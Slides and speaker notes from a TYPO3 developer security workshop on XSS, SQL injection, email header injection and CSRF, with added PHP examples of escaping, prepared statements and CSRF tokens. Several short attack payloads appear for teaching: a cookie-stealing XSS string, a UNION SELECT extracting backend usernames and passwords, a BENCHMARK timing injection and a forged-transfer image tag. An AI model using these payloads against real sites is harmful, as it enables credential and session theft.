TYPO3 Developer Days - Elmshorn 2010   Inspiring people to share
Security Workshop
T3DD10 Security
 Security flaws versus Security concepts
                 02.07.2010

Helmut Hummel <helmut@typo3.org>

Introduction

Do you ...
   ... know me?
   ... have a working development environment?
   ... ever heard of XSS?
   ... ever heard of SQLi?
   ... ever heard of CSRF?
   ... ever found a vulnerability in a TYPO3 extension?
   ... reported your findings to security@typo3.org?

Did you ever hack for
Security Flaws versus Security Concepts

Agenda
   General Security Concepts
   Hacking / Code Review Session
   Getting into details about some vulnerability types
   Writing down best practices for TYPO3 developers

What is Security?

Security is not a state

Security is a process
   The security of an application must be proven over time
   Security must constantly be improved
   An application can never be secure ...
   ... but only not insecure at a particular time
   The "costs" for security must relate to the possible impacts

General Security Concepts
   Minimize Exposure / Least privilege
   Don't trust user data, don't trust Services
   Filter -> Validate -> Escape, never mix them up
   Defense in depth
   Positive Security Model (Whitelist)
   Use logging
   Avoid security by obscurity
Cross Site Scripting (XSS)

XSS
   Persistent / non-persistent XSS
   Injecting Up / Break out of the current DOM context
   Injecting Down
   Stay in the current context, but use the possibilities
     <img src="javascript:alert(document.cookie)" />

Preventing XSS
   Input validation and/or filtering is not enough
   Escape correctly, depending on the context
     <script>...NEVER PUT UNTRUSTED DATA HERE...</script>
     <img src="... OR HERE ..." />
     ... because then you're doomed
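The context-specific escaping the slide calls for, as an added PHP example that is not part of the workshop material; the helper names (escapeHtml, escapeAttr, escapeJs, escapeUrlParam, safeUrlAttr) are this example's own. It also covers the "injecting down" case from the XSS slide, where escaping alone does not help and the URL scheme has to be whitelisted.

```php
<?php
// Added example, not from the workshop slides: one escaping helper per
// output context. All helper names are this example's own choice.

declare(strict_types=1);

// HTML element content: <p>HERE</p>
function escapeHtml(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HTML attribute value: <input value="HERE"> (the attribute must be quoted,
// otherwise a space already ends the value and escaping quotes is useless)
function escapeAttr(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// JavaScript variable value: var x = HERE;
// json_encode() yields a quoted JS string literal; the HEX flags make sure the
// literal can neither close the <script> block nor an enclosing attribute.
function escapeJs(string $untrusted): string
{
    return json_encode(
        $untrusted,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// URL parameter: href="/search?q=HERE" (attribute-escape the whole URL after)
function escapeUrlParam(string $untrusted): string
{
    return rawurlencode($untrusted);
}

// "Injecting down": a value inside src="..." needs no '<' or '"' to become
// dangerous, because javascript: is a valid URL there. Escaping keeps the
// attacker inside the attribute; a scheme whitelist keeps the attribute safe.
function safeUrlAttr(string $untrusted): string
{
    // browsers ignore embedded tabs/newlines ("java\tscript:"), so drop
    // control characters before looking at the scheme
    $url = preg_replace('/[\x00-\x20\x7f]/', '', $untrusted);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === false) {
        return '#'; // parse_url could not make sense of it: refuse
    }
    $isRelative = $scheme === null && !str_starts_with($url, '//');
    if (!$isRelative && !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '#'; // any other scheme (javascript:, data:, ...) is refused
    }
    return escapeAttr($url);
}

// Constructed inputs: an "injecting up" payload and an "injecting down" one.
$name = '"><script>alert(document.cookie)</script>';
$src  = 'javascript:alert(document.cookie)';

echo '<p>Hello ' . escapeHtml($name) . "</p>\n";
echo '<input name="name" value="' . escapeAttr($name) . "\">\n";
echo '<script>var name = ' . escapeJs($name) . ";</script>\n";
echo '<a href="/search?q=' . escapeAttr(escapeUrlParam($name)) . "\">search</a>\n";
echo '<img src="' . safeUrlAttr($src) . "\">\n";                  // src="#"
echo '<img src="' . safeUrlAttr('/fileadmin/logo.png') . "\">\n"; // unchanged
```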
Email Header Injection

Email Header Injection
   PHP mail() function and From: header
   Use filter_var($mail, FILTER_VALIDATE_EMAIL)
   Do not allow chr(10) or chr(13)
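The two checks from the slide combined in front of mail(), as an added PHP example that is not part of the workshop material; the function and exception names (validatedEmail, headerValue, buildHeaders, HeaderInjectionException) and the sample addresses are constructed for this example.

```php
<?php
// Added example, not from the workshop slides: validate the From: address
// with filter_var() and reject CR/LF in every header value before mail().

declare(strict_types=1);

final class HeaderInjectionException extends RuntimeException {}

// Returns the address if it is syntactically valid, otherwise throws.
function validatedEmail(string $address): string
{
    $address = trim($address);
    // FILTER_VALIDATE_EMAIL already rejects line breaks, but the explicit
    // chr(10)/chr(13) check documents the intent and gives a clear error.
    if (strpbrk($address, "\r\n") !== false) {
        throw new HeaderInjectionException('line break in e-mail address');
    }
    if (filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        throw new HeaderInjectionException('invalid e-mail address');
    }
    return $address;
}

// Any other header value (Subject, a display name, ...): no chr(10)/chr(13).
function headerValue(string $value): string
{
    if (strpbrk($value, "\r\n\0") !== false) {
        throw new HeaderInjectionException('line break in header value');
    }
    return $value;
}

// Builds the additional_headers string for mail() from validated parts only.
function buildHeaders(string $from, ?string $replyTo = null): string
{
    $headers = ['From: ' . validatedEmail($from)];
    if ($replyTo !== null) {
        $headers[] = 'Reply-To: ' . validatedEmail($replyTo);
    }
    return implode("\r\n", $headers);
}

// Constructed inputs: the second one tries to append a Bcc: header.
$good = 'alice@example.org';
$bad  = "alice@example.org\r\nBcc: everyone@example.net";

echo buildHeaders($good), "\n";                    // From: alice@example.org
try {
    buildHeaders($bad);
} catch (HeaderInjectionException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";    // rejected: line break in e-mail address
}
// Real call: mail($to, headerValue($subject), $body, buildHeaders($from));
```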
SQL Injection (SQLi)

SQLi
   (blind) SQL Injections
   Timing attacks
   UNION SELECT
     Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0 from be_users where admin in(1)
   Check your TypoScript!

Prevent SQLi
   Prepared Statements / PDO
   Escaping
   Typecasting (intval), whitelist validation
   Using an ORM (extbase, FLOW3, QCodo, ...)
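Three of the defences from the "Prevent SQLi" slide (prepared statements, typecasting, whitelist validation) on one repository class, as an added PHP example that is not part of the workshop material; the class, table and column names are constructed, and the demo runs against an in-memory SQLite database so it needs no TYPO3 installation.

```php
<?php
// Added example, not from the workshop slides: PDO prepared statement for
// values, (int) cast for ids, whitelist for identifiers. Names are constructed.

declare(strict_types=1);

final class ItemRepository
{
    // Positive security model: identifiers cannot be bound as parameters,
    // so only these columns may ever reach an ORDER BY clause.
    private const SORTABLE = ['title', 'crdate'];

    public function __construct(private PDO $db) {}

    // Prepared statement: the value never becomes part of the SQL text.
    public function findByUid(string $rawUid): ?array
    {
        $uid = (int) $rawUid; // typecasting: "1 OR 1=1" becomes 1, "abc" becomes 0
        if ($uid <= 0) {
            return null;
        }
        $stmt = $this->db->prepare(
            'SELECT uid, title, description FROM items WHERE uid = :uid AND deleted = 0'
        );
        $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }

    // Whitelist validation for the part a placeholder cannot cover.
    public function listSorted(string $rawColumn, string $rawDir): array
    {
        $column = in_array($rawColumn, self::SORTABLE, true) ? $rawColumn : 'title';
        $dir = strtoupper($rawDir) === 'DESC' ? 'DESC' : 'ASC';
        // only whitelisted literals are interpolated here
        $stmt = $this->db->query(
            "SELECT uid, title FROM items WHERE deleted = 0 ORDER BY $column $dir"
        );
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// Demonstration on an in-memory SQLite database with constructed rows.
// (On MySQL, additionally set PDO::ATTR_EMULATE_PREPARES => false so the
// server, not the driver, does the parameter binding.)
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE items (uid INTEGER PRIMARY KEY, title TEXT,
            description TEXT, crdate INTEGER, deleted INTEGER)');
$pdo->exec("INSERT INTO items VALUES (1, 'first', 'public', 10, 0),
            (2, 'second', 'hidden', 20, 1)");

$repo = new ItemRepository($pdo);
var_dump($repo->findByUid('1')['title']);      // string(5) "first"
var_dump($repo->findByUid('1 OR 1=1'));        // row 1 only: the cast drops the tail
var_dump($repo->findByUid('abc'));             // NULL
var_dump($repo->listSorted('title; DROP TABLE items', 'desc')); // sorted by title DESC
```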
Cross Site Request Forgery

CSRF
   Executing arbitrary actions on behalf of a victim
     <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">
   Stored CSRF (like XSS)
   Targeted Emails
   Requires probably some kind of social engineering

Prevent CSRF
   Limiting to POST and checking referrer not enough
   Double Submit Cookies
   Challenge-Response
   Synchronizer Token Pattern
   No Cross-Site Scripting (XSS) Vulnerabilities
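The Synchronizer Token Pattern from the "Prevent CSRF" slide, as an added PHP example that is not part of the workshop material; the function names (csrfToken, csrfField, csrfValid) and the session array standing in for $_SESSION are this example's own.

```php
<?php
// Added example, not from the workshop slides: Synchronizer Token Pattern.
// A random per-session token is embedded in every state-changing form and
// compared on submit. Function and constant names are this example's own.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';
const CSRF_FIELD = '__csrf';

// One token per session (the slide also allows one per request; per-request
// tokens break the browser back button, as the speaker notes point out).
function csrfToken(array &$session): string
{
    if (!isset($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Hidden field for a form. Attribute-escaped even though the token is hex.
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="' . $token . '">';
}

// Verify a submitted POST body. hash_equals() compares in constant time.
// Method and referrer are deliberately not the decision: the slide says
// they are not enough, since POST can be forged and the referrer spoofed.
function csrfValid(array $session, array $post): bool
{
    if (!isset($session[CSRF_SESSION_KEY], $post[CSRF_FIELD])) {
        return false;
    }
    if (!is_string($post[CSRF_FIELD])) {
        return false;
    }
    return hash_equals($session[CSRF_SESSION_KEY], $post[CSRF_FIELD]);
}

// Demonstration with a constructed session array instead of $_SESSION.
$session = [];
echo csrfField($session), "\n";

// Legitimate submit: the browser sends back the field it was given.
$legit = [CSRF_FIELD => $session[CSRF_SESSION_KEY], 'amount' => '100'];
var_dump(csrfValid($session, $legit));   // bool(true)

// Forged request from a third-party page (like the <img> on the slide):
// the browser attaches the victim's cookies, but the token lives only in
// the server-side session and the page the victim was shown.
$forged = ['amount' => '100000'];
var_dump(csrfValid($session, $forged));  // bool(false)

// Remaining precondition from the slide: no XSS, because a script running
// in the victim's page can read the hidden field and send it along.
```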
Application Vulnerabilities

More
   Information Disclosure
   HTTP Response Splitting
   Path Traversal
   Privilege Escalation
   Session Fixation
   LDAP Injection
   Remote Code Execution

T3DD10 Security Workshop

Resources
   PHP-Sicherheit (Christopher Kunz and Stefan Esser)
   Essential PHP Security (Chris Shiflett)
   http://www.owasp.org/
   http://www.ibm.com/developerworks/opensource/library/os-php-secure-apps/index.html
   http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

SQLi Exploit
   http://192.168.100.139/introductionpackage/t3dd10/pi1/?no_cache=1&tx_co...

XSS Exploit
   http://192.168.100.139/introductionpackage/t3dd10/pi2/?no_cache=1&tx_coo...

XSS Exploit
   bit.ly/bpJzpF
   http://192.168.100.139/introductionpackage/t3dd10/pi2/?...

inspiring people to share.
Slides of the T3DD10 Security Workshop
Speaker notes

  • Who already heard of XSS, CSRF

  • since 2005, security since 2008, leader since end 2009

  • Application Security, not personal nor governmental

  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he gets back, he or she won't attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, so the security concepts have to

  • give least information possible (wizard.dat), hide files from webroot, DB users, Apache user
    User data: GET, POST, COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (health record example)
    TYPO3, no private data stored in DB or HD, not even images
    authentication through 64bit hash calculated of password
    all data from external DB where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source

  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." /><img src="javascript:alert(document.cookie)" />
    "You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into."

  • Input Validation: "a>b" or "Me & you"
    twitter attack
    Escape not easy because of the different contexts of HTML
    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    <script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
    <!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
    <div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
    <...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name
    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter

  • SELECT title, description, body FROM items WHERE ID = 2 and 1=2
    SELECT title, description, body FROM items WHERE ID = 2 and 1=1
    1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;
    Defense in depth (saltedpw)
    http://localhost:8888/introductionpackage/t3dd10/pi1/?L=1%29%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0%20from%20be_users%20where%20admin%20in%281

  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): '' are necessary

  • POST can be forged, referrer can be spoofed
    Double Submit Cookies
    * sending session id as cookie and form values
    Downsides: session hijacking, httponly for cookies not valid any more
    Challenge-Response:
    * CAPTCHA
    * Re-Authentication (password), confirmation? alert() via JavaScript, clickable?
    * One-time Token
    Synchronizer Token Pattern
    * Generate one or more random tokens for a session (per session or per request)
    * randomize token variable name (per request downside: browser back button)
    http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

  • Privilege Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution